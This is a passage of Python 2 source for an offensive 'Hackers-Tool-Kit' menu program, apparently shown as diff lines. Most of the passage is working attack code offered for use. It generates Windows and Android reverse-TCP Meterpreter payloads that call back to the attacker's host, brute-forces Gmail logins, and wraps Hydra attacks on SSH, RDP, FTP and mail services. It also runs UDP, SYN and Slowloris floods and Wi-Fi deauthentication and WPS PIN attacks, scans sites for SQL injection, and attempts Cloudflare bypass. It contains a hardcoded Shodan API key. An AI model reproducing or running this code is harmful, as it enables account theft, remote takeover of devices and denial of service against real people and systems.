▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig 